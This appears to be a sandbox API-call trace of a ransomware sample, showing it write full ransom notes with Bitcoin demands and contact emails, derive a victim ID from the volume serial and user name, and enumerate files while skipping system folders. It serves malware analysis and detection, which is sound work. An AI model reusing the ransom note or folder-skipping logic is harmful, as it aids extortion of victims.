	[0179.230] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.230] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.233] CloseHandle (hObject=0x384) returned 1
	[0179.233] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.233] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.234] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0179.235] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.236] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoshared\\logs\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.236] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.236] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.236] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0179.236] CloseHandle (hObject=0x384) returned 1
	[0179.237] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.237] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.237] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.237] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\USOShared\\Logs\\HELP_DECRYPT_YOUR_FILES.HTML") returned 62
	[0179.237] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoshared\\logs\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.239] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.239] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0179.242] CloseHandle (hObject=0x384) returned 1
	[0179.243] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.243] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.243] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.244] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0179.245] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.245] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoshared\\logs\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0179.245] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.246] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.246] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0179.246] CloseHandle (hObject=0x384) returned 1
	[0179.246] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\*.*" (normalized: "c:\\users\\all users\\usoshared\\logs\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x845deb22, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0179.246] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\*.*") returned 37
	[0179.247] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.247] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\*.*", cchLength=0x25 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\*.*") returned 0x25
	[0179.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.247] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="windows") returned 0x0
	[0179.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.247] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="boot") returned 0x0
	[0179.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.248] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="system volume information") returned 0x0
	[0179.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.248] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.248] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="temp") returned 0x0
	[0179.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.248] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="program files") returned 0x0
	[0179.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.249] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.249] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="appdata") returned 0x0
	[0179.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.249] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="application data") returned 0x0
	[0179.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.250] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="winnt") returned 0x0
	[0179.250] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.250] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="tmp") returned 0x0
	[0179.250] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.250] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="cache") returned 0x0
	[0179.250] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.260] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.260] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="webcache") returned 0x0
	[0179.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.260] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="inetcache") returned 0x0
	[0179.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.261] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="nvidia") returned 0x0
	[0179.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.261] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="packages") returned 0x0
	[0179.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.261] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="cookies") returned 0x0
	[0179.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.261] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\*.*", lpSrch="programdata") returned 0x0
	[0179.262] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.262] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x845deb22, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.262] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x845deb22, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x845deb22, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x845deb22, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x845b8c05, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x845b8c05, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x845deb22, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.001.etl", cAlternateFileName="UP2DAF~1.ETL")) returned 1
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcd7f0371, ftLastAccessTime.dwHighDateTime=0x1d97680, ftLastWriteTime.dwLowDateTime=0xf49a3604, ftLastWriteTime.dwHighDateTime=0x1d97680, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.002.etl", cAlternateFileName="UP3884~1.ETL")) returned 1
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x8c08b661, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb412100a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.003.etl", cAlternateFileName="UP8247~1.ETL")) returned 1
	[0179.262] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xb4f89421, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xeca50022, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.004.etl", cAlternateFileName="UPD2FC~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x60797ea1, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x8857baf6, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.005.etl", cAlternateFileName="UPB784~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x615d8964, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0x88859575, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.006.etl", cAlternateFileName="UP7D55~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x3a5fe900, ftLastAccessTime.dwHighDateTime=0x1d7b059, ftLastWriteTime.dwLowDateTime=0x6178db96, ftLastWriteTime.dwHighDateTime=0x1d7b059, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.007.etl", cAlternateFileName="UP52FC~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf801cbae, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0x1f56df07, ftLastWriteTime.dwHighDateTime=0x1d75218, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.008.etl", cAlternateFileName="UPA721~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf98df460, ftLastAccessTime.dwHighDateTime=0x1d705ef, ftLastWriteTime.dwLowDateTime=0x22721e58, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.009.etl", cAlternateFileName="UPFC55~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x6fb852ed, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xa05d916a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.010.etl", cAlternateFileName="UPB13B~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x46a3d34f, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6df6574e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.011.etl", cAlternateFileName="UP076F~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x95f9994e, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x95f9994e, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.012.etl", cAlternateFileName="UPEBF6~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9ee92c6a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xc6371102, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.013.etl", cAlternateFileName="UP8DEE~1.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe7e7af85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe7e7af85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.014.etl", cAlternateFileName="UPDATE~4.ETL")) returned 1
	[0179.263] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x4e8a793e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8a793e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.015.etl", cAlternateFileName="UPDATE~2.ETL")) returned 1
	[0179.264] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x1d9a4c7e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.016.etl", cAlternateFileName="UPDATE~1.ETL")) returned 1
	[0179.264] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xa689893c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xac9249a5, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateUx.001.etl", cAlternateFileName="UP654C~1.ETL")) returned 1
	[0179.264] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 1
	[0179.264] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 0
	[0179.264] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0179.264] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0179.264] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xc71a4326, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xc71a4326, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 0
	[0179.265] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0179.265] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
